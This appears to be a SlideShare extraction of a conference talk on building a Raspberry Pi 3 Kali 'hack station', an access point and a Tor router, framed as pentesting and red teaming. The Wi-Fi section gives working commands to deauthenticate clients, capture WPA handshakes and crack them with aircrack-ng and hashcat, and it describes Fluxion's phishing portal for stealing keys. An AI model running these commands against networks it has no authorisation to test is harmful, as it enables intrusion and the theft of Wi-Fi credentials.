SlideShare a Scribd company logo
Thursday, June 21, 2018 1
Raspberry Pi 3
Thursday, June 21, 2018 2
Whoami
Sanket Kakde
Sr.Consultant @ LTI
www.linkedin.com/in/sanket-kakde-1717a677
https://twitter.com/kakdesanket?s=09
Thursday, June 21, 2018
What will we be doing today ???
Hackstation Onion-Pi /TOR Switch Firewall
Intrusion Detection System
Wi-Fi Attack Domain Controller
What is the
Raspberry Pi?
✓ A low cost, credit-card sized computer
✓ Small computer that can communicate with
outside world (Internet)
✓ Cost effective computer
✓ Use standard keyboard & mouse , plugs into
monitor or TV
Thursday, June 21, 2018
4
Raspberry Pi Hardware
✓ 64-bit quad core ARM Cortex A53 clocked at 1.2 GHz processor
✓ 1 GB RAM LPDDR2-900
✓ Videocore IV GPU
✓ On-board 802.11n WiFi
✓ Bluetooth 4.0
✓ Ethernet 10/100
✓ Video Output – HDMI
✓ Storage micro-SD
✓ 40 pin GPIO
✓ 4 USB Ports
✓ CSI Camera Port
5
Raspberry Pi Kit
Thursday, June 21, 2018 6
What do I support ???
Thursday, June 21, 2018 7
Basic Hack Station Setup
Steps to install KALI Linux NEXMON
✓ Download KALI (https://www.offensive-
security.com/kali-linux-arm-images/)
✓ Install Win32DiskImager
✓ Connect SD Card to computer
✓ Write image to SD Card using Win32Diskimager
✓ Good to Go
✓ Verify Installation by connecting RSPI in your network
Namp –sn 192.168.0.1/24
ssh root@192.168.0.125
✓ Update & Upgrade to latest version
apt-get update
apt-get upgrade
Thursday, June 21, 2018 8
Hack Station Configuration
✓ Resize FS to utilize SD Card
Install tightvncserver
Apt-get install tightvncserver
Install gparted : Rezsize the file system
Steps to configure Access Point on RASPI
✓ Install hostapd &isc-dhcp-server
Hotapd :HostAPD is a user space daemon for access point and authentication servers.
apt-get install hostapd
isc-dhcp-server : DHCP Server for access point
apt-get install isc-dhcp-server
✓ Configure DHCP Server
✓ Modify configuration file vim /etc/dhcp/dhcpd.conf
✓ #option domain-name
✓ #option domain-name-servers
✓ authoritative;
✓ subnet 192.168.42.0 netmask 255.255.255.0 {
range 192.168.42.10 192.168.42.50;
option broadcast-address 192.168.42.255;
option routers 192.168.42.1;
default-lease-time 600;
max-lease-time 7200;
Thursday, June 21, 2018 9
Hack Station Configuration
✓ Configure DHCP Server
✓ Edit default DHCP Config file to
✓ INTERFACES="wlan0“
✓ Turn off wireless interface
✓ ifdown wlan0
✓ Assign Static IP to Wireless Interface
✓ Vim /etc/network/interfaces
auto lo
iface lo inet loopback
iface eth0 inet dhcp
allow-hotplug wlan0
iface wlan0 inet static
address 192.168.42.1
netmask 255.255.255.0
✓ Assign IP Address to wireless interface
✓ ifconfig wlan0 192.168.42.1
Thursday, June 21, 2018 10
Hack Station Configuration
✓ Configure Hostapd
✓ Edit Configuration file /etc/hostapd/hostapd.conf
interface=wlan0
#driver=rtl871xdrv
ssid=TORNet
country_code=US
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=Raspberry
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
Thursday, June 21, 2018 11
Hack Station Configuration
✓Configure Hostpad
✓ Edit Default config files /etc/default/hostapd
DAEMON_CONF="/etc/hostapd/hostapd.conf"
✓ Edit /etc/sysctl.conf
net.ipv4.ip_forward=1
✓ Save and Flush iptables rules (Not mandatory)
sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED
-j ACCEPT
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
sh -c "iptables-save > /etc/iptables/rules.v4"
BUG : Kali Nexmon has bug in wifi driver you must bring up monitor interface
before starting hostapd
iw phy phy0 interface add mon0 type monitor && ifconfig mon0 up
✓ Start Services and enable them at startup
service hostapd start
service isc-dhcp-server start
update-rc.d hostapd enable
update-rc.d isc-dhcp-server enable
Thursday, June 21, 2018 12
Hack Station Configuration
✓Configure SSH Interface
✓ Vim /etc/ssh/sshd_config
✓ Modify ListenAddress to wlan0 Interface address in this case 192.168.42.1
Thursday, June 21, 2018 13
Hack Station Use Cases
✓ Red Teaming
✓ Pocket Computer
✓ Network Penetration Testing
✓ Social Engineering Attack
✓ …..Contd
Thursday, June 21, 2018 14
Demo
Thursday, June 21, 2018 15
Thursday, June 21, 2018 16
Raspberry Pi 3
TOR Switch
TOR-PI Setup
Thursday, June 21, 2018 17
Steps to install KALI Linux NEXMON
✓ Download KALI (https://www.offensive-security.com/kali-linux-arm-images/)
✓ Install Win32DiskImager
✓ Connect SD Card to computer
✓ Write image to SD Card using Win32Diskimager
✓ Good to Go
✓ Verify Installation by connecting RSPI in your network
Namp –sn 192.168.0.1/24
ssh root@192.168.0.125
✓ Update & Upgrade to latest version
apt-get update
apt-get upgrade
✓ Setup hostapd and isc-dhcp-server as demonstrated in previous slides.
TOR-PI Configuration
✓Install TOR
✓ apt-get update
✓ apt-get install tor
✓Edit TOR Configuration File
✓Vim /etc/tor/torrc
Log notice file /var/log/tor/notices.log
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsSuffixes .onion,.exit
AutomapHostsOnResolve 1
TransPort 9040
TransListenAddress 192.168.42.1
DNSPort 53
DNSListenAddress 192.168.42.1
Thursday, June 21, 2018 18
✓ Setup Iptables to route traffic
iptables -F
iptables -t nat -F
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 22 -j REDIRECT --to-ports 22
iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j REDIRECT --to-ports 53
iptables -t nat -A PREROUTING -i wlan0 -p tcp --syn -j REDIRECT --to-ports 9040
iptables -t nat -L
sh -c "iptables-save > /etc/iptables.ipv4.nat“
✓ Create log files
touch /var/log/tor/notices.log
chown debian-tor /var/log/tor/notices.log
chmod 644 /var/log/tor/notices.log
✓ Start TOR Services
service tor start
service tor status
update-rc.d tor enable
Thursday, June 21, 2018 19
TOR-PI Configuration
TOR-PI Use Cases
Anonymous Browsing
Hide online traces
Deep Web / Dark Web Market Access
TOR Relays
Thursday, June 21, 2018 20
Demo
Thursday, June 21, 2018 21
Wi-Fi Hacking
Kali Linux can be used for many things, but it
probably is best known for its ability to penetration
test, or “hack,” WPA and WPA2 networks.
All we need is raspberry pi and wireless network
interface capable of packet injection which supports
usage in promiscuous (monitoring) mode.
Raspberry Pi 3
Raspberry + Alpha Card
Thursday, June 21, 2018
22
Wi-Fi Security
Target Protocols
WEP : Wired Equivalent Privacy
WPA /WPA2 : Wi-Fi Procted Access
Thursday, June 21, 2018 23
Wi-Fi Attack Tools
Aircrack-ng
airmon-ng :
Converts our wireless card into a promiscuous mode wireless
card
airodump-ng :
Capture packets of our specification
airplay-ng :
Aireplay-ng is another powerful tool in our aircrack-ng
arsenal, and it can be used to generate or accelerate traffic on
the AP.
Aircrack-ng
Used to crack captured hashesh.
Thursday, June 21, 2018 24
Wi-Fi Attack Tools
Commands
✓ List network interface and there mode
✓ iwconfig
✓ #Enable monitor mode on wlan0
✓ airmon-ng start wlan0
✓ Sniffing wifi packets , LIST ALL NEARBY STATIONS
✓ airodump-ng WLAN0MON
✓ #Scan particular station for clients and capture handshake
✓ airodump-ng wlan0mon --bssid C8:3A:35:37:BA:18 --channel 11 --
write test
✓ #Deauth all the clients from wifi
✓ aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 wlan0mon
✓ Deauth specific client the clients from wifi
✓ aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 -c
48:88:CA:E9:83:0D wlan0mon
✓ Password cracking
Thursday, June 21, 2018 25
Password Cracking using GPU Hashcat & Aircrack-ng
✓ Password cracking using aircrack-ng
✓ aircrack-ng -w Wifidictionary --bssid 50:C7:BF:79:4A:3A File.cap
✓ Password Cracking using Hashcat
✓ Convert *.cap file into hccapx
✓ Online
✓ Converter :https://hashcat.net/cap2hccapx/
✓ Offline
✓ Tool :https://github.com/hashcat/hashcat-utils
✓ Cracking
✓ Dictionary attack
✓ hashcat.exe -m 2500 capture.hccapx rockyou.txt
✓ Brute-Force attack
✓ hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d
✓ Rule-based attack
✓ hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt
Thursday, June 21, 2018 26
Demo
Thursday, June 21, 2018 27
Wi-Fi Social Engineering Attack Fluxion
Fluxion is a security auditing and
social-engineering research tool.
The script attempts to retrieve the
WPA/WPA2 key from a target
access point by means of a social
engineering (phishing) attack.
Compatible with the latest release
of Kali (rolling).
Thursday, June 21, 2018 28
How it works ?
✓Scan the networks.
✓Capture a handshake
✓Launch a Fake AP instance
✓ Fake Use WEB Interface
✓Fake DNS Server
✓Deauth users
✓Captive portals
Thursday, June 21, 2018 29
Wi-Fi Social Engineering Attack Fluxion
Thursday, June 21, 2018 30
Thursday, June 21, 2018 31
Demo

More Related Content

What's hot

Successes and Challenges of IPv6 Transition at APNIC
Successes and Challenges of IPv6 Transition at APNICSuccesses and Challenges of IPv6 Transition at APNIC
Successes and Challenges of IPv6 Transition at APNIC
APNIC
 
Triển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gponTriển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gpon
laonap166
 
LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.
LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.
LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.
LF_OpenvSwitch
 
EvasionTechniques
EvasionTechniquesEvasionTechniques
EvasionTechniques
Candan BOLUKBAS
 
How to Use GSM/3G/4G in Embedded Linux Systems
How to Use GSM/3G/4G in Embedded Linux SystemsHow to Use GSM/3G/4G in Embedded Linux Systems
How to Use GSM/3G/4G in Embedded Linux Systems
Toradex
 
Dedicated servers
Dedicated serversDedicated servers
5. hands on - building local development environment with Open Mano
5. hands on - building local development environment with Open Mano5. hands on - building local development environment with Open Mano
5. hands on - building local development environment with Open Mano
videos
 
Resolution for a Faster Site
Resolution for a Faster SiteResolution for a Faster Site
Resolution for a Faster Site
Ido Safruti
 
VYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edgeVYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edge
Faelix Ltd
 
PuppetConf 2013 vCloud Hybrid Service and Puppet
PuppetConf 2013 vCloud Hybrid Service and PuppetPuppetConf 2013 vCloud Hybrid Service and Puppet
PuppetConf 2013 vCloud Hybrid Service and Puppet
Nan Liu
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
Men and Mice
 
LF_OVS_17_Red Hat's perspective on OVS HW Offload Status
LF_OVS_17_Red Hat's perspective on OVS HW Offload StatusLF_OVS_17_Red Hat's perspective on OVS HW Offload Status
LF_OVS_17_Red Hat's perspective on OVS HW Offload Status
LF_OpenvSwitch
 
Cisco CCNA- NAT Configuration
Cisco CCNA- NAT ConfigurationCisco CCNA- NAT Configuration
Cisco CCNA- NAT Configuration
Hamed Moghaddam
 
Nat
NatNat
portfolio2
portfolio2portfolio2
portfolio2
Joseph Alcantara
 
Keeping your rack cool
Keeping your rack cool Keeping your rack cool
Keeping your rack cool
Pavel Odintsov
 

What's hot (16)

Successes and Challenges of IPv6 Transition at APNIC
Successes and Challenges of IPv6 Transition at APNICSuccesses and Challenges of IPv6 Transition at APNIC
Successes and Challenges of IPv6 Transition at APNIC
 
Triển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gponTriển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gpon
 
LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.
LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.
LF_OVS_17_Enabling hardware acceleration in OVS-DPDK using DPDK Framework.
 
EvasionTechniques
EvasionTechniquesEvasionTechniques
EvasionTechniques
 
How to Use GSM/3G/4G in Embedded Linux Systems
How to Use GSM/3G/4G in Embedded Linux SystemsHow to Use GSM/3G/4G in Embedded Linux Systems
How to Use GSM/3G/4G in Embedded Linux Systems
 
Dedicated servers
Dedicated serversDedicated servers
Dedicated servers
 
5. hands on - building local development environment with Open Mano
5. hands on - building local development environment with Open Mano5. hands on - building local development environment with Open Mano
5. hands on - building local development environment with Open Mano
 
Resolution for a Faster Site
Resolution for a Faster SiteResolution for a Faster Site
Resolution for a Faster Site
 
VYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edgeVYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edge
 
PuppetConf 2013 vCloud Hybrid Service and Puppet
PuppetConf 2013 vCloud Hybrid Service and PuppetPuppetConf 2013 vCloud Hybrid Service and Puppet
PuppetConf 2013 vCloud Hybrid Service and Puppet
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
 
LF_OVS_17_Red Hat's perspective on OVS HW Offload Status
LF_OVS_17_Red Hat's perspective on OVS HW Offload StatusLF_OVS_17_Red Hat's perspective on OVS HW Offload Status
LF_OVS_17_Red Hat's perspective on OVS HW Offload Status
 
Cisco CCNA- NAT Configuration
Cisco CCNA- NAT ConfigurationCisco CCNA- NAT Configuration
Cisco CCNA- NAT Configuration
 
Nat
NatNat
Nat
 
portfolio2
portfolio2portfolio2
portfolio2
 
Keeping your rack cool
Keeping your rack cool Keeping your rack cool
Keeping your rack cool
 

Similar to Raspberry pi 3

Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi
Daniele Albrizio
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
Freddy Buenaño
 
IDNOG 4 Lightning Talks - Documenting your Network in 3 Simple Steps
IDNOG 4 Lightning Talks - Documenting your Network in 3 Simple StepsIDNOG 4 Lightning Talks - Documenting your Network in 3 Simple Steps
IDNOG 4 Lightning Talks - Documenting your Network in 3 Simple Steps
Affan Basalamah
 
LT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your network
LT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your networkLT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your network
LT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your network
Indonesia Network Operators Group
 
P&G BT Global Services - LLD Final Revision Year 2008.
P&G BT Global Services - LLD Final Revision Year 2008.P&G BT Global Services - LLD Final Revision Year 2008.
P&G BT Global Services - LLD Final Revision Year 2008.
Kapil Sabharwal
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training
videos
 
XS Boston 2008 Network Topology
XS Boston 2008 Network TopologyXS Boston 2008 Network Topology
XS Boston 2008 Network Topology
The Linux Foundation
 
How our Cloudy Mindsets Approached Physical Routers
How our Cloudy Mindsets Approached Physical RoutersHow our Cloudy Mindsets Approached Physical Routers
How our Cloudy Mindsets Approached Physical Routers
Steffen Gebert
 
p10
p10p10
p10
p10p10
QNAP Surveillance Solutions
QNAP Surveillance SolutionsQNAP Surveillance Solutions
QNAP Surveillance Solutions
CK Chen
 
BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」
BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」
BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」
BitVisor
 
Configure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfConfigure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdf
BT Digital
 
Monitoring CloudStack and components
Monitoring CloudStack and componentsMonitoring CloudStack and components
Monitoring CloudStack and components
ShapeBlue
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
Wim Godden
 
Host Data Plane Acceleration: SmartNIC Deployment Models
Host Data Plane Acceleration: SmartNIC Deployment ModelsHost Data Plane Acceleration: SmartNIC Deployment Models
Host Data Plane Acceleration: SmartNIC Deployment Models
Netronome
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
Chanaka Lasantha
 
Assigning ip addresses
Assigning ip addressesAssigning ip addresses
7 hands on
7 hands on7 hands on
7 hands on
videos
 
Known basic of NFV Features
Known basic of NFV FeaturesKnown basic of NFV Features
Known basic of NFV Features
Raul Leite
 

Similar to Raspberry pi 3 (20)

Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
 
IDNOG 4 Lightning Talks - Documenting your Network in 3 Simple Steps
IDNOG 4 Lightning Talks - Documenting your Network in 3 Simple StepsIDNOG 4 Lightning Talks - Documenting your Network in 3 Simple Steps
IDNOG 4 Lightning Talks - Documenting your Network in 3 Simple Steps
 
LT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your network
LT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your networkLT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your network
LT04 IDNOG04 - Affan Basalamah (ITB) - Documenting your network
 
P&G BT Global Services - LLD Final Revision Year 2008.
P&G BT Global Services - LLD Final Revision Year 2008.P&G BT Global Services - LLD Final Revision Year 2008.
P&G BT Global Services - LLD Final Revision Year 2008.
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training
 
XS Boston 2008 Network Topology
XS Boston 2008 Network TopologyXS Boston 2008 Network Topology
XS Boston 2008 Network Topology
 
How our Cloudy Mindsets Approached Physical Routers
How our Cloudy Mindsets Approached Physical RoutersHow our Cloudy Mindsets Approached Physical Routers
How our Cloudy Mindsets Approached Physical Routers
 
p10
p10p10
p10
 
p10
p10p10
p10
 
QNAP Surveillance Solutions
QNAP Surveillance SolutionsQNAP Surveillance Solutions
QNAP Surveillance Solutions
 
BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」
BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」
BitVisor Summit 8「3. AQC107 Driver and Changes coming to network API」
 
Configure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfConfigure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdf
 
Monitoring CloudStack and components
Monitoring CloudStack and componentsMonitoring CloudStack and components
Monitoring CloudStack and components
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Host Data Plane Acceleration: SmartNIC Deployment Models
Host Data Plane Acceleration: SmartNIC Deployment ModelsHost Data Plane Acceleration: SmartNIC Deployment Models
Host Data Plane Acceleration: SmartNIC Deployment Models
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
 
Assigning ip addresses
Assigning ip addressesAssigning ip addresses
Assigning ip addresses
 
7 hands on
7 hands on7 hands on
7 hands on
 
Known basic of NFV Features
Known basic of NFV FeaturesKnown basic of NFV Features
Known basic of NFV Features
 

Recently uploaded

Design and optimization of ion propulsion drone
Design and optimization of ion propulsion droneDesign and optimization of ion propulsion drone
Design and optimization of ion propulsion drone
bjmsejournal
 
Engineering Standards Wiring methods.pdf
Engineering Standards Wiring methods.pdfEngineering Standards Wiring methods.pdf
Engineering Standards Wiring methods.pdf
edwin408357
 
Digital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptxDigital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptx
aryanpankaj78
 
Generative AI Use cases applications solutions and implementation.pdf
Generative AI Use cases applications solutions and implementation.pdfGenerative AI Use cases applications solutions and implementation.pdf
Generative AI Use cases applications solutions and implementation.pdf
mahaffeycheryld
 
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURSCompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
RamonNovais6
 
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
IJECEIAES
 
An Introduction to the Compiler Designss
An Introduction to the Compiler DesignssAn Introduction to the Compiler Designss
An Introduction to the Compiler Designss
ElakkiaU
 
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student MemberIEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
VICTOR MAESTRE RAMIREZ
 
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
shadow0702a
 
Gas agency management system project report.pdf
Gas agency management system project report.pdfGas agency management system project report.pdf
Gas agency management system project report.pdf
Kamal Acharya
 
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by AnantLLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
Anant Corporation
 
22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
KrishnaveniKrishnara1
 
ITSM Integration with MuleSoft.pptx
ITSM  Integration with MuleSoft.pptxITSM  Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
VANDANAMOHANGOUDA
 
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
upoux
 
Software Engineering and Project Management - Software Testing + Agile Method...
Software Engineering and Project Management - Software Testing + Agile Method...Software Engineering and Project Management - Software Testing + Agile Method...
Software Engineering and Project Management - Software Testing + Agile Method...
Prakhyath Rai
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
ecqow
 
Data Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason WebinarData Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason Webinar
UReason
 
Software Engineering and Project Management - Introduction, Modeling Concepts...
Software Engineering and Project Management - Introduction, Modeling Concepts...Software Engineering and Project Management - Introduction, Modeling Concepts...
Software Engineering and Project Management - Introduction, Modeling Concepts...
Prakhyath Rai
 
4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf
4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf
4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf
Gino153088
 
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
Yasser Mahgoub
 

Recently uploaded (20)

Design and optimization of ion propulsion drone
Design and optimization of ion propulsion droneDesign and optimization of ion propulsion drone
Design and optimization of ion propulsion drone
 
Engineering Standards Wiring methods.pdf
Engineering Standards Wiring methods.pdfEngineering Standards Wiring methods.pdf
Engineering Standards Wiring methods.pdf
 
Digital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptxDigital Twins Computer Networking Paper Presentation.pptx
Digital Twins Computer Networking Paper Presentation.pptx
 
Generative AI Use cases applications solutions and implementation.pdf
Generative AI Use cases applications solutions and implementation.pdfGenerative AI Use cases applications solutions and implementation.pdf
Generative AI Use cases applications solutions and implementation.pdf
 
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURSCompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
CompEx~Manual~1210 (2).pdf COMPEX GAS AND VAPOURS
 
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
 
An Introduction to the Compiler Designss
An Introduction to the Compiler DesignssAn Introduction to the Compiler Designss
An Introduction to the Compiler Designss
 
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student MemberIEEE Aerospace and Electronic Systems Society as a Graduate Student Member
IEEE Aerospace and Electronic Systems Society as a Graduate Student Member
 
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
Use PyCharm for remote debugging of WSL on a Windo cf5c162d672e4e58b4dde5d797...
 
Gas agency management system project report.pdf
Gas agency management system project report.pdfGas agency management system project report.pdf
Gas agency management system project report.pdf
 
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by AnantLLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
LLM Fine Tuning with QLoRA Cassandra Lunch 4, presented by Anant
 
22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
 
ITSM Integration with MuleSoft.pptx
ITSM  Integration with MuleSoft.pptxITSM  Integration with MuleSoft.pptx
ITSM Integration with MuleSoft.pptx
 
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
一比一原版(osu毕业证书)美国俄勒冈州立大学毕业证如何办理
 
Software Engineering and Project Management - Software Testing + Agile Method...
Software Engineering and Project Management - Software Testing + Agile Method...Software Engineering and Project Management - Software Testing + Agile Method...
Software Engineering and Project Management - Software Testing + Agile Method...
 
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
一比一原版(CalArts毕业证)加利福尼亚艺术学院毕业证如何办理
 
Data Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason WebinarData Driven Maintenance | UReason Webinar
Data Driven Maintenance | UReason Webinar
 
Software Engineering and Project Management - Introduction, Modeling Concepts...
Software Engineering and Project Management - Introduction, Modeling Concepts...Software Engineering and Project Management - Introduction, Modeling Concepts...
Software Engineering and Project Management - Introduction, Modeling Concepts...
 
4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf
4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf
4. Mosca vol I -Fisica-Tipler-5ta-Edicion-Vol-1.pdf
 
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
 

Raspberry pi 3

  • 1. Thursday, June 21, 2018 1 Raspberry Pi 3
  • 2. Thursday, June 21, 2018 2 Whoami Sanket Kakde Sr.Consultant @ LTI www.linkedin.com/in/sanket-kakde-1717a677 https://twitter.com/kakdesanket?s=09
  • 3. Thursday, June 21, 2018 What will we be doing today ??? Hackstation Onion-Pi /TOR Switch Firewall Intrusion Detection System Wi-Fi Attack Domain Controller
